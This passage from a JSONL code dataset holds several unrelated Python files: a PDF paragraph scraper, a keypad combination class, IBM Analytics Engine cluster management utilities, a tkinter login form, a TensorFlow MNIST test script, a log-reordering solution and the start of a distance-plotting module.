name='create-anon-user')\n]","sub_path":"monthly_expenses/apps/users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"393845391","text":"from dataclasses import dataclass, field\nimport itertools\nimport re\nimport sys\nfrom typing import Dict, Generator, List\n\nfrom PyPDF2 import PdfFileReader\n\n\ndef clean_text(text: str) -> str:\n text = re.sub(\n r\"Case\\s1\\:14\\-cv\\-\\d+\\-[A-Z]+\\-[A-Z]+\\s+Document\\s\\d+\\s+Filed\\s\\d{2}/\\d{2}/\\d{2}\\s+Page\\d\\d+\\sof\\s\\d+\",\n \"\",\n text,\n )\n return text\n\n\n@dataclass\nclass Paragraph:\n number: int = 0\n pages: List[int] = field(default_factory=list)\n text: str = \"\"\n\n @property\n def primary_compliance(self) -> str:\n compliance = {}\n match = re.search(\n r\"Primary:\\s+([a-zA-Z]+\\s+[a-zA-Z]+\\s{0,1}[a-zA-Z]*\\s{0,1}\\w*)\\s\\s*\",\n self.text,\n )\n if match:\n return match.group(1)\n else:\n return \"None\"\n\n @property\n def secondary_compliance(self) -> str:\n match = re.search(\n r\"Secondary:\\s+([a-zA-Z]+\\s+[a-zA-Z]+\\s{0,1}[a-zA-Z]*\\s{0,1}\\w*)\\s\\s*\",\n self.text,\n )\n if match:\n return match.group(1)\n else:\n return \"None\"\n\n @property\n def operational_compliance(self) -> str:\n match = re.search(\n r\"Operational:\\s+([a-zA-Z]+\\s+[a-zA-Z]+\\s{0,1}[a-zA-Z]*\\s{0,1}[a-zA-Z]*)\\b(? 
int:\n    match = re.search(r\"^\\s*(\\d{1,3})\\s+\", page.replace(\"\\n\", \"\"))\n    if match:\n        return int(match.group(1))\n    else:\n        return 0\n\n\ndef operational_section(pages: Generator) -> Generator:\n    front_matter = True\n    next(itertools.islice(pages, 3, None))  # skip TOC\n    while front_matter:\n        page = next(pages)\n        match = re.search(r\"\\s4\\.7\\s+\\w+\", page)\n        if match:\n            front_matter = False\n    chained = itertools.chain((i for i in [page]), pages)\n    return (item for item in chained)\n\n\ndef scrape_data(pages: Generator, page_count: int) -> List:\n    paragraphs = []\n    _pages = []\n    p = Paragraph()\n    text = \"\"  # accumulated text for the current paragraph\n    for i, page in enumerate(pages):\n        page_num = get_page_num(page)\n        _pages.append(page_num)\n        page = page.replace(\"\\n\", \"\")\n        page = re.sub(r\"^\\s*(\\d{1,3})\\s+\", \"\", page)\n        page_split = re.split(\n            r\"4\\.7\\.\\d+\\sAssessing\\sCompliance\\s[with\\s]*Paragraph\\s(\\d{2,3})\\:*\", page\n        )\n        if len(page_split) > 1:\n            for x in page_split:\n                match = re.search(r\"^(\\d+)$\", x)\n                if match:\n                    if p:\n                        p.text = clean_text(text)\n                        p.pages = _pages\n                        paragraphs.append(p)\n                        p = Paragraph()\n                        _pages = []\n                        _pages.append(page_num)\n                    text = \"\"\n                    paragraph_num = match.group(1)\n                    p.number = paragraph_num\n                elif p and not match:\n                    text += x\n        else:\n            text += \"\\n\\n\"\n            text += page\n        if i + 1 == page_count:\n            p.text = text\n            p.pages = _pages\n            paragraphs.append(p)\n    return paragraphs\n\n\ndef scrape(input_file: str) -> List[Paragraph]:\n    with open(input_file, \"rb\") as f:\n        reader = PdfFileReader(f)\n        page_count = reader.getNumPages()\n        pages = (reader.getPage(i).extractText() for i in range(page_count))\n        pages = operational_section(pages)\n        ps = scrape_data(pages, page_count - 3)\n    return ps\n","sub_path":"PY_SCRAPER/imr-scraper/imrscrape/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"366615374","text":"from random import choice\n\"\"\"\nThe purpose of this file is to hold the classes and functions\nnecessary to allow the keypad to function. 
This includes\ngenerating a new set of keys and commands to see them.\n\"\"\"\n\nOLD_CHOICES = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P']\nCHOICES = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'A', 'B', 'C', 'D', 'E', 'F']\nclass Keypad():\n\n def __init__(self):\n self.combo = [choice(OLD_CHOICES), choice(OLD_CHOICES), choice(OLD_CHOICES)]\n\n # Generate a new set of random keys to press\n def generateKeys(self, switchValue):\n firstOne = ord(choice(OLD_CHOICES)) - ord('A')\n\n # Ensure that the first switch value is not the same as the current\n # switch value\n if switchValue is not None:\n switchValue = ord(switchValue) - ord('A')\n\n while(firstOne == switchValue):\n firstOne = ord(choice(OLD_CHOICES)) - ord('A')\n\n self.combo = [firstOne, ord(choice(OLD_CHOICES))- ord('A'), ord(choice(OLD_CHOICES)) - ord('A')]\n return 0\n\n # Get value of specified key\n def getKey(self, index):\n if (index <= 2 and index >= 0):\n return self.combo[index]\n else:\n # This is an error, as there are only 3 numbers\n return -1\n\n # Set values of combo\n def setCombo(self, newCombo):\n if (newCombo[0] >= 0 and\n newCombo[0] <= 15 and\n newCombo[1] >= 0 and\n newCombo[1] <= 15 and\n newCombo[2] >= 0 and\n newCombo[2] <= 15):\n self.combo = [newCombo[0], newCombo[1], newCombo[2]]\n return 0\n else:\n return -1\n\n # Checks that key pressed is the correct one for that index\n def checkKey(self, keystroke, index):\n return self.combo[index] == keystroke\n\n def checkCombo(self, entryQueue):\n if len(entryQueue) < 3:\n return False\n elif len(entryQueue) == 3:\n print(\"Proper Length, Check values\")\n # print(\"Expecting %(first)s, %(second)s, %(third)s\" % {'first': ord(self.combo[0]) - ord('A'),\n # 'second': ord(self.combo[1]) - ord('A'),\n # 'third': ord(self.combo[2]) - ord('A')\n # })\n convertQueue = list()\n convertQueue.append(int(entryQueue[0], 16))\n convertQueue.append(int(entryQueue[1], 16))\n convertQueue.append(int(entryQueue[2], 16))\n\n print(\"Expecting %(first)s, %(second)s, %(third)s\" % {'first': self.combo[0],\n 'second': self.combo[1],\n 'third': self.combo[2]\n })\n print(\"Pre %(first)s, %(second)s, %(third)s\" % {'first': entryQueue[0],\n 'second': entryQueue[1],\n 'third': entryQueue[2]\n })\n print(\"Raw %(first)s, %(second)s, %(third)s\" % {'first': convertQueue[0],\n 'second': convertQueue[1],\n 'third': convertQueue[2]\n })\n return self.checkKey(convertQueue[0], 0) and self.checkKey(convertQueue[1], 1) and self.checkKey(convertQueue[2], 2)\n else:\n print(\"TOO BIG\")\n # Queue is too big\n return False\n\n # get a string of the combination\n def sprintCombo(self):\n return '(%(first)s, %(second)s, %(third)s)' % {'first': self.combo[0],\n 'second': self.combo[1],\n 'third': self.combo[2]\n }\n\n # Print the current code to the terminal\n def printCombo(self):\n print (self.sprintCombo())\n","sub_path":"old_python/flask/functions/keypad.py","file_name":"keypad.py","file_ext":"py","file_size_in_byte":4308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"389771968","text":"import sys,requests,json,time,os,argparse,re\nfrom retrying import retry\nfrom datetime import datetime\n\n# Set constants and the region which defines the REST API paths to use\ndef init(REGION = 'us-south'): \n IAM_PATHS = {\"us-south\":\"https://iam.ng.bluemix.net/identity/token\", \n \"eu-gb\": \"https://api.eu-gb.bluemix.net/identity/token\", \n \"jp-tok\" : \"https://iam.ng.bluemix.net/identity/token\", 
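                 # note: jp-tok appears to reuse the us-south IAM host (iam.ng.bluemix.net) here rather than a region-specific endpoint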
\n \"eu-de\": \"https://api.eu-de.bluemix.net/identity/token\"\n }\n\n if REGION not in IAM_PATHS:\n raise Exception(\"Incorrect region_id provided:{} Valid region_ids:\".format(REGION, list(IAM_PATHS.keys())))\n \n globals()['IAM_AUTH_PATH'] = IAM_PATHS[REGION]\n globals()['IAE_API_PATH'] = 'https://api.{}.ae.cloud.ibm.com/v2/analytics_engines'.format(REGION)\n globals()['RESOURCE_CONTROLLER_PATH_V1'] = 'https://resource-controller.cloud.ibm.com/v1'\n globals()['RESOURCE_CONTROLLER_PATH_V2'] = 'https://resource-controller.bluemix.net/v2' \n globals()['WDP_API_PATH'] = 'https://api.dataplatform.cloud.ibm.com/v2'\n globals()['IAE_RESOURCE_PLANS'] = {'lite': '7715aa8d-fb59-42e8-951e-5f1103d8285e',\n 'hourly':'3175a5cf-61e3-4e79-aa2a-dff9a4e1f0ae',\n 'monthly':'34594484-afda-40e6-b93b-341fbbaed242'}\n globals()['HARDWARE_CONFIGS'] = ['default','memory-intensive']\n\n globals()['CLUSTER_PROVISION_TEMPLATE']={\n \"name\": \"\",\n \"resource_plan_id\": \"\", \n \"resource_group_id\": \"\",\n \"region_id\": REGION,\n \"parameters\": {\n \"hardware_config\": \"\",\n \"num_compute_nodes\": \"\",\n \"software_package\": \"ae-1.1-hadoop-spark\", \n #ae-1.2-hive-llap, ae-1.2-hive-spark, ae-1.2-hadoop-spark,ae-1.1-spark, ae-1.1-hive-spark, ae-1.1-hadoop-spark\n \"advanced_options\": {\n \"ambari_config\": {\n \"spark2-defaults\": {\n \"spark.dynamicAllocation.enabled\": True,\n \"spark.shuffle.service.enabled\": True,\n \"spark.dynamicAllocation.minExecutors\": \"1\" ,\n \"spark.dynamicAllocation.maxExecutors\": \"10\",\n \"spark.dynamicAllocation.cachedExecutorIdleTimeout\": \"900\",\n \"spark.dynamicAllocation.executorIdleTimeout\": \"300\",\n \"spark.executor.instances\" : \"1\",\n \"spark.executor.cores\": \"1\",\n \"spark.executor.memory\": \"4G\",\n \"spark.driver.cores\": \"1\",\n \"spark.driver.memory\": \"4G\",\n \"spark.python.profile\": False\n }\n }\n }\n }\n }\n \n globals()['CLUSTER_CUSTOMIZATION_TEMPLATE'] ={\n \"target\": \"all\",\n \"custom_actions\": [{\n \"name\":\"install_customization\",\n \"script\":{\n \"source_type\": \"https\",\n \"source_props\": {\n \"base_url\":\"https://github.ibm.com/api/v3\",\n \"org\": \"\",\n \"token\": \"\",\n \"user\":\"\"\n },\n \"script_path\": \"\"\n },\n \"script_params\": [\"\"]\n }]\n }\n \n return\n\ndef printLog(*msgs): \n print(datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\") , ' '.join(map(str, msgs)) )\n\n@retry(stop_max_attempt_number=5, wait_fixed=60000)\ndef get_iam_token(api_key):\n printLog(\"Get IAM Auth token\")\n headers = {\"Content-type\": \"application/x-www-form-urlencoded\",\"Authorization\": \"Basic Yng6Yng=\"}\n data = \"apikey={}&grant_type=urn%3Aibm%3Aparams%3Aoauth%3Agrant-type%3Aapikey\".format(api_key)\n response=requests.post(IAM_AUTH_PATH, headers=headers, data=data)\n iam_token=response.json()['access_token']\n return iam_token\n\n@retry(stop_max_attempt_number=5, wait_fixed=60000)\ndef get_iae_instance_id(name, iam_token):\n printLog(\"Get instance id for\", name)\n headers = {\"Authorization\": \"Bearer {}\".format(iam_token)}\n url = \"{}/resource_instances\".format(RESOURCE_CONTROLLER_PATH_V1)\n response=requests.get(url, headers=headers)\n resources=response.json()['resources']\n instance_id=None\n for resource in resources:\n if resource['name'] == name:\n instance_id=resource['guid']\n break\n return instance_id\n\n@retry(stop_max_attempt_number=5, wait_fixed=60000)\ndef get_resource_group_id(api_key, group_name):\n printLog(\"Get resource group id for\", group_name)\n iam_token = get_iam_token(api_key)\n headers 
= {\"Authorization\": \"Bearer {}\".format(iam_token)}\n url = \"{}/resource_groups\".format(RESOURCE_CONTROLLER_PATH_V1)\n response=requests.get(url, headers=headers)\n resources=response.json()['resources']\n resource_group_id=None\n for resource in resources:\n if resource['name'] == group_name:\n resource_group_id=resource['id']\n break\n return resource_group_id\n\n# gets the named project attributes and clusters with its credentials (including IAE passwords)\n# Currently, only way to get IAE password without changing it.\n# https://ibm-cloudplatform.slack.com/archives/C7DGE3CUV/p1559059138002600\n@retry(stop_max_attempt_number=5, wait_fixed=60000)\ndef get_studio_project_config(api_key, project_name):\n printLog(\"Get studio project config for\", project_name)\n iam_token=get_iam_token(api_key)\n headers = {\"Authorization\": \"Bearer {}\".format(iam_token),\"Content-Type\": \"application/json\"} \n url=\"{}/projects?name={}\".format(WDP_API_PATH, project_name)\n response=requests.get(url, headers=headers)\n return response.json()\n \n@retry(stop_max_attempt_number=5, wait_fixed=60000) \ndef get_customization_status(instance_id, request_id, iam_token):\n headers = {\"Authorization\": \"Bearer {}\".format(iam_token),\"Content-Type\": \"application/json\"}\n url=\"{}/{}/customization_requests/{}\".format(IAE_API_PATH, instance_id,request_id)\n response=requests.get(url, headers=headers)\n #printLog(response.text)\n return response.json()\n\ndef wait_for_customization_completion(instance_id, request_id, iam_token, wait_interval_sec=60):\n run_status='CustomizingCluster'\n printLog(\"Waiting for cluster customization to finish ..\")\n while run_status == 'CustomizingCluster':\n time.sleep(wait_interval_sec)\n response=get_customization_status(instance_id, request_id, iam_token)\n run_status=response['run_status'] \n if run_status == 'Failed':\n printLog(\"Error customizing cluster.\")\n raise Exception(response.text)\n printLog(\"Customization complete with status=\",run_status)\n return\n\n# Run a adhoc script downloaded from github to customize all the nodes in the cluster \n# https://cloud.ibm.com/docs/AnalyticsEngine?topic=AnalyticsEngine-cust-cluster&locale=en\ndef run_cluster_customization(bmx_api_key, iae_name, git_token, git_org, git_user, git_script_path, script_params):\n printLog(\"Start cluster customization for\",iae_name)\n iam_token=get_iam_token(bmx_api_key)\n instance_id=get_iae_instance_id(iae_name, iam_token)\n headers = {\"Authorization\": \"Bearer {}\".format(iam_token),\"Content-Type\": \"application/json\"}\n url=\"{}/{}/customization_requests\".format(IAE_API_PATH, instance_id)\n template=CLUSTER_CUSTOMIZATION_TEMPLATE\n template[\"custom_actions\"][0][\"script_params\"]=script_params.split()\n \n # add git token to the url\n if git_script_path.startswith(\"https://\"):\n git_script_path = git_script_path.replace(\"https://\", \"https://{}@\".format(git_token))\n else:\n git_script_path = \"{}@{}\".format(git_token, git_script_path)\n \n data = json.dumps(template)\\\n .replace(\"\",git_token)\\\n .replace(\"\",git_script_path)\\\n .replace(\"\",git_org)\\\n .replace(\"\",git_user)\n \n #printLog(url, headers, data)\n response=requests.post(url, headers=headers, data=data)\n printLog(response.text) \n if hasattr(response, 'json') and 'request_id' in response.json():\n request_id=response.json()['request_id']\n wait_for_customization_completion(instance_id, request_id, iam_token)\n else:\n printLog(\"Error customizing cluster.\")\n printLog(response.text)\n raise 
Exception(response.text)\n printLog(\"Cluster customization done.\")\n return\n\n\n@retry(stop_max_attempt_number=5, wait_fixed=60000)\ndef get_provision_status(instance_id, iam_token):\n headers = {\"Authorization\": \"Bearer {}\".format(iam_token),\"Content-Type\": \"application/json\"}\n url = \"{}/{}/state\".format(IAE_API_PATH, instance_id)\n response = requests.get(url, headers=headers)\n return response.json()\n\n# monitor and wait for povisioning to complete. Sleep 1min between status checks\ndef wait_for_provision_completion(instance_id, iam_token, wait_interval_sec=60):\n run_status='Preparing'\n printLog(\"Waiting for provisioning to complete...\")\n while run_status in ['Preparing','Inactive']:\n time.sleep(wait_interval_sec)\n response = get_provision_status(instance_id, iam_token)\n run_status = response['state']\n #printLog(response)\n if run_status == 'Failed':\n printLog(\"Error creating cluster.\")\n raise Exception(response.text)\n \n printLog(\"Provisioning complete with status=\", run_status)\n return\n\n#Start the provisioning and wait for it to complete\n# https://cloud.ibm.com/docs/AnalyticsEngine?topic=AnalyticsEngine-provisioning-IAE&locale=en\ndef run_cluster_provision(bmx_api_key, iae_name, resource_group_name, compute_node_count, hardware_config, iae_plan):\n printLog(\"Start cluster provisioning\", iae_name)\n if hardware_config not in HARDWARE_CONFIGS:\n raise Exception(\"Incorrect IAE hardware_config provided:{} .. Correct values{}\".format(hardware_config, HARDWARE_CONFIGS))\n if iae_plan not in IAE_RESOURCE_PLANS:\n raise Exception(\"Incorrect IAE iae_plan provided:{} .. Correct values{}\".format(iae_plan, list(IAE_RESOURCE_PLANS.keys())))\n \n resource_group_id = get_resource_group_id(bmx_api_key, resource_group_name)\n iam_token = get_iam_token(bmx_api_key)\n \n headers = {\"Authorization\": \"Bearer {}\".format(iam_token),\"Content-Type\": \"application/json\"}\n cluster_config = CLUSTER_PROVISION_TEMPLATE\n cluster_config['name'] = iae_name\n cluster_config['resource_plan_id'] = IAE_RESOURCE_PLANS[iae_plan]\n cluster_config['resource_group_id'] = resource_group_id\n cluster_config['parameters']['num_compute_nodes'] = compute_node_count\n cluster_config['parameters']['hardware_config'] = hardware_config\n data = json.dumps(cluster_config)\n #printLog(url, headers, data)\n url=\"{}/resource_instances\".format(RESOURCE_CONTROLLER_PATH_V1)\n response=requests.post(url, headers=headers, data=data)\n printLog(\"Cluster provisioning started... \")\n # if provisioning started, wait for completion\n if hasattr(response, 'json') and 'guid' in response.json():\n instance_id=response.json()['guid']\n wait_for_provision_completion(instance_id, iam_token)\n else:\n printLog(\"Error creating cluster.\")\n printLog(response.text)\n raise Exception(response.text)\n return\n\n#https://cloud.ibm.com/apidocs/resource-controller#delete-a-resource-key-by-id\ndef run_cluster_resource_keys_deletion(api_key, iae_name):\n printLog(\"Delete resource keys for \", iae_name)\n iam_token=get_iam_token(api_key)\n instance_id=get_iae_instance_id(iae_name, iam_token)\n if not instance_id:\n raise Exception(\"Cluster deletion failed. 
No such cluster.\")\n headers = {\"Authorization\": \"Bearer {}\".format(iam_token),\"Content-Type\": \"application/json\"}\n url=\"{}/resource_instances/{}/resource_keys\".format(RESOURCE_CONTROLLER_PATH_V2, instance_id)\n response=requests.get(url, headers=headers).json()\n for resource in response['resources']:\n key = resource['guid'] \n url=\"{}/resource_keys/{}\".format(RESOURCE_CONTROLLER_PATH_V2, key)\n requests.delete(url, headers=headers)\n return\n\n# https://cloud.ibm.com/docs/services/AnalyticsEngine?topic=AnalyticsEngine-delete-service#resource-controller-rest-api\n@retry(stop_max_attempt_number=5, wait_fixed=60000)\ndef run_cluster_deletion(bmx_api_key, iae_name):\n run_cluster_resource_keys_deletion(bmx_api_key, iae_name) # New IAE, delete resource keys first\n printLog(\"Delete cluster\", iae_name)\n iam_token=get_iam_token(bmx_api_key)\n instance_id=get_iae_instance_id(iae_name, iam_token)\n if not instance_id:\n raise Exception(\"Cluster deletion failed. No such cluster.\")\n headers = {\"Authorization\": \"Bearer {}\".format(iam_token),\"Content-Type\": \"application/json\"}\n url=\"{}/resource_instances/{}\".format(RESOURCE_CONTROLLER_PATH_V2, instance_id)\n requests.delete(url, headers=headers)\n return\n\n# https://ibm-cloudplatform.slack.com/archives/C7DGE3CUV/p1559059138002600\n# https://www.ibm.com/blogs/bluemix/2019/02/ibm-analytics-engine-changes-to-cluster-credential-access/\n# New IAE clusters no longer store passwords. Reset Password API shud be called at cluster creation to\n# get the password and shud be stored for downstream API calls. \n# This is only way to get passwords unless the cluster has already been \n# added to Watson Studio, in which case, use get_studio_project_config() to get password.\n@retry(stop_max_attempt_number=15, wait_fixed=60000)\ndef get_cluster_credentials(api_key, iae_name):\n printLog(\"Get cluster credentials for\", iae_name)\n iam_token=get_iam_token(api_key)\n instance_id = get_iae_instance_id(iae_name, iam_token)\n if not instance_id:\n raise Exception(\"Unable to obtain cluster instance id.\")\n \n iae_credentials = {}\n \n # Get username/password\n headers = {\"Authorization\": \"Bearer {}\".format(iam_token),\"Content-Type\": \"application/json\"}\n url=\"{}/{}/reset_password\".format(IAE_API_PATH, instance_id)\n response=requests.post(url, headers=headers) \n if hasattr(response, 'json'):\n credentials=response.json()['user_credentials'] \n iae_credentials['username']=credentials['user']\n iae_credentials['password']=credentials['password']\n else:\n printLog(\"Unable to retrieve user/password.\")\n printLog(response.text)\n raise Exception('Unable to retrieve user/password')\n\n # Recent change in REST API for new IAE Cluster. 
First get source_crn for IAE, to get endpoints!!!\n headers = {\"Authorization\": \"Bearer {}\".format(iam_token),\"Content-Type\": \"application/json\"}\n url = '{}/resource_instances'.format(RESOURCE_CONTROLLER_PATH_V2)\n response=requests.get(url, headers=headers)\n source_crn = None\n for resource in response.json()['resources']:\n if resource['name'] == iae_name:\n source_crn = resource['crn']\n \n # Get service endpoints using the source crn\n headers = {\"Authorization\": \"Bearer {}\".format(iam_token),\"Content-Type\": \"application/json\"}\n data = {'name': iae_name, 'source_crn':source_crn}\n url = '{}/resource_keys'.format(RESOURCE_CONTROLLER_PATH_V1)\n response = requests.post(url, headers=headers, data= json.dumps(data))\n response = json.loads(re.sub('mn00.', 'mn003', response.text))# sometimes credentials return host with \"mn001\" which is never reachable\n if 'credentials' in response:\n iae_credentials['service_endpoints']= response['credentials']['cluster']['service_endpoints']\n else:\n printLog(\"Error getting cluster service credentials.\")\n printLog(response)\n raise Exception(response)\n \n return iae_credentials\n\n\n@retry(stop_max_attempt_number=5, wait_fixed=60000)\ndef get_spark_job_status(credentials, job_id):\n headers = {'Content-Type': 'application/json', 'X-Requested-By': 'livy'}\n url = \"{}/{}/state\".format(credentials['service_endpoints']['livy'], job_id)\n response = requests.get(url, headers=headers, auth=(credentials['username'], credentials['password']))\n printLog(\"job state:\", response.text)\n return response.json()['state']\n\n@retry(stop_max_attempt_number=5, wait_fixed=60000)\ndef get_spark_job_log(credentials, job_id):\n headers = {'Content-Type': 'application/json', 'X-Requested-By': 'livy'}\n url = \"{}/{}/log\".format(credentials['service_endpoints']['livy'], job_id)\n response = requests.get(url, headers=headers, auth=(credentials['username'], credentials['password']))\n return response.json()['log']\n \ndef wait_for_spark_job_completion(credentials, job_id, wait_interval_sec=60):\n printLog(\"Waiting for spark job completion for job_id=\",job_id)\n run_status=get_spark_job_status(credentials, job_id)\n while run_status in ['running','starting','idle']:\n time.sleep(wait_interval_sec)\n run_status = get_spark_job_status(credentials, job_id)\n printLog(\"Job complete with status=\",run_status)\n return run_status\n \n\n# Submit a spark job and wait for its completion\n# https://cloud.ibm.com/docs/services/AnalyticsEngine?topic=AnalyticsEngine-livy-api\n# https://github.com/cloudera/livy#rest-api\ndef run_spark_job_to_completion(credentials, job_config_path):\n printLog(\"Submit spark job\")\n # Submit job\n headers = {'Content-Type': 'application/json', 'X-Requested-By': 'livy'}\n url = credentials['service_endpoints']['livy'] \n with open(job_config_path) as json_file: \n data = json.load(json_file)\n\n response = requests.post(url, headers=headers, data=json.dumps(data), auth=(credentials['username'], credentials['password']))\n printLog(response.text)\n job_id = response.json()['id'] \n run_status = wait_for_spark_job_completion(credentials, job_id)\n log = get_spark_job_log(credentials, job_id)\n return log\n\n\ninit()\n","sub_path":"cluster-mgmt-utils/manage_iae_cluster_utils.py","file_name":"manage_iae_cluster_utils.py","file_ext":"py","file_size_in_byte":18548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"492659565","text":"#The included code stub will read an integer, 
n, from STDIN.\n#Without using any string methods, try to print the following:\n#123...n Exm: n=5 output: 12345\n\nn = int(input())\n\nif n >= 1 and n <= 150:\n\n for i in range(1,n+1):\n print(i,end=\"\")\n\n ","sub_path":"Print Function.py","file_name":"Print Function.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"539998455","text":"from tkinter import *\nfrom .GUI_baseUI import UI\n\n\nclass login_UI(UI):\n\n \"\"\"\n Login to Email UI\n \"\"\"\n\n\n def __init__(self, master, img):\n super().__init__(master, img)\n\n\n # ------------------MID FRAME ----------------------------------\n self.mid_frame.grid_columnconfigure(0, weight=1)\n self.mid_frame.grid_columnconfigure(3, weight=1)\n # self.mid_frame.config(background='green')\n\n\n self.mid_frame.grid_rowconfigure(1, weight=1)\n\n self.header_label = Label(self.mid_frame, text='Enter Email', font=(\"TkDefaultFont\", 12))\n self.header_label.grid(row=0, column=1, pady=10, columnspan=2)\n # self.model_list_frame.config(background='green')\n\n\n # #----------------ENTRY FRAME---------------------------------\n # makes boarders to center the input frame\n self.var = IntVar()\n self.var.set(0)\n\n self.account_frame = Frame(self.mid_frame)\n self.account_frame.grid(row=1, column=1, sticky='ns')\n # self.account_frame.config(background='red')\n self.account_frame.grid_rowconfigure(0, weight=1)\n self.account_frame.grid_rowconfigure(5, weight=1)\n\n self.account_label = Label(self.account_frame, text='Email :')\n self.account_entry = Entry(self.account_frame, width=30)\n self.pin_label = Label(self.account_frame, text='Password :')\n self.pin_entry = Entry(self.account_frame, width=30, show=\"*\")\n self.login_but = Button(self.account_frame, text='Login', width=10)\n\n self.account_label.grid(row=1, column=0, sticky=E, padx=5, pady=5)\n self.account_entry.grid(row=1, column=1, sticky=E, padx=5, pady=5)\n self.pin_label.grid(row=2, column=0, sticky=E, padx=5, pady=5)\n self.pin_entry.grid(row=2, column=1, sticky=E, padx=5, pady=5)\n self.login_but.grid(row=3, column=1, padx=30, pady=5)\n\n self.model_list_frame = Frame(self.mid_frame)\n self.model_list_frame.grid(row=1, column=2, sticky='nsew')\n\n # self.model_list_frame.grid_rowconfigure(0, weight=1)\n self.model_list_frame.grid_rowconfigure(2, weight=2)\n # self.model_list_frame.grid_rowconfigure(3, weight=1)\n\n\n self.model_list_label = Label(self.model_list_frame, text='Model List')\n self.model_list = Listbox(self.model_list_frame, width=30, selectmode='multiple')\n self.model_list_scrollbar = Scrollbar(self.model_list_frame, orient='vertical')\n self.model_list.config(yscrollcommand=self.model_list_scrollbar.set)\n self.model_list_scrollbar.config(command=self.model_list.yview)\n\n self.model_list_label.grid(row=1, padx=5)\n self.model_list.grid(row=2, pady=5, sticky='ns')\n self.model_list_scrollbar.grid(row=2, column=1, sticky='ns')\n\n # self.radio_but_new = Radiobutton(self.account_frame, text=\"New Scans\", variable=self.var, value=0, indicatoron=1)\n # self.radio_but_all = Radiobutton(self.account_frame, text=\"All Scans\", variable=self.var, value=1, indicatoron=1)\n # self.radio_but_new.select()\n\n # self.radio_but_all.grid(row=4, column=3, sticky=E, padx=5, pady=10)\n # self.radio_but_new.grid(row=4, column=4, sticky=E, padx=5, pady=10)\n\n\n # -------------Bottom FRAME ---------------------------------------------\n self.botbut_frame.grid_rowconfigure(0, weight=1)\n 
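        # rows 0 and 2 get stretch weight so the middle button row presumably stays vertically centered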
self.botbut_frame.grid_rowconfigure(2, weight=1)\n\n        self.botbut_frame.grid_columnconfigure(1, weight=1)\n\n        self.can_but = Button(self.botbut_frame, text='Cancel', width=10)\n        self.can_but.grid(row=1, column=0, padx=30, pady=15)\n\n        self.get_but = Button(self.botbut_frame, text='Get Scans', width=10)\n        self.get_but.grid(row=1, column=2, padx=30, pady=15)\n\n\n\nif __name__ == \"__main__\":\n    root = Tk()\n    img = \"\"\n    login_UI(root, img)\n    mainloop()\n","sub_path":"view/GUI_login.py","file_name":"GUI_login.py","file_ext":"py","file_size_in_byte":3859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"146111235","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\n# ## Importing the already trained model\n\n# In[2]:\n\n\nsaver = tf.train.import_meta_graph(\"./models/my_model_final.ckpt.meta\")\n\n\n# In[3]:\n\n\nfor op in tf.get_default_graph().get_operations():\n    print(op.name)\n\n\n\n# ## Using the model\n\n# ### Importing the variables to use\n\n# In[45]:\n\n\nX = tf.get_default_graph().get_tensor_by_name(\"X:0\")\n\nlogits = tf.get_default_graph().get_tensor_by_name(\"dnn/logits/BiasAdd:0\")\npredictions = tf.argmax(logits, 1)\n\n\n# ## Importing the library and converting the png files to mnist format, then evaluating the image\n\n# In[46]:\n\n\nimport png_to_mnist\n\n\n# In[56]:\n\n\ninit = tf.global_variables_initializer()\n\nsess = tf.InteractiveSession()\n \ninit.run()\n\nchoix = \"O\"\nwhile choix != \"n\":\n    image = input(\"Please enter the path to the .png image: \")\n\n    image = np.array(png_to_mnist.imagePrepare(image))\n\n    img = np.array([image])\n    predicted_labels = predictions.eval(feed_dict={X: img})\n    print(\"The predicted value is: \", predictions.eval(feed_dict={X: img}))\n\n    plt.gray()\n    plt.imshow(image.reshape([28, 28]))\n    plt.show()\n\n    \n    \n    choix = input(\"Do you want to run another test? (O/n) \")\n    print(\"\\n\\n\\n\")\n    \n\n\n# In[ ]:\n\n\n\n\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"358569571","text":"# amazon OA\n\nclass Solution:\n    def reorderLogFiles(self, logs):\n        letter_logs = filter(lambda x: x[-1] >= \"a\" and x[-1] <= \"z\", logs)\n        digit_logs = filter(lambda x: x[-1] >= \"0\" and x[-1] <= \"9\", logs)\n        letter_logs = sorted(letter_logs, \n            key = lambda x: (x.split(\" \", 1)[1], x.split(\" \", 1)[0]))\n        letter_logs.extend(digit_logs)\n        return letter_logs\n\n\nif __name__ == \"__main__\":\n    x = [\"a1 9 2 3 1\",\"g1 act car\",\"zo4 4 7\",\"ab1 off key dog\",\"a8 act zoo\"]\n    print(Solution().reorderLogFiles(x))\n\n","sub_path":"OA/OA_Amazon_reorder_log_files.py","file_name":"OA_Amazon_reorder_log_files.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"280215967","text":"\"\"\"Plot the distance between pairs of 2D points on a 2D grid in 3D.\"\"\"\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pylab\n\n\ndef plot_dist_map(x_test, y_test, y_prediction, name):\n    \"\"\"Plot the distance between pairs of 2D points on a 2D grid in 3D.\n\n    This module can be used to plot the (2 norm) distance between two points :math:`y, y' \\in \\mathbb{R}^2` for a given\n    grid (:math:`\\subset \\mathbb{R}^2`) of pairs. 
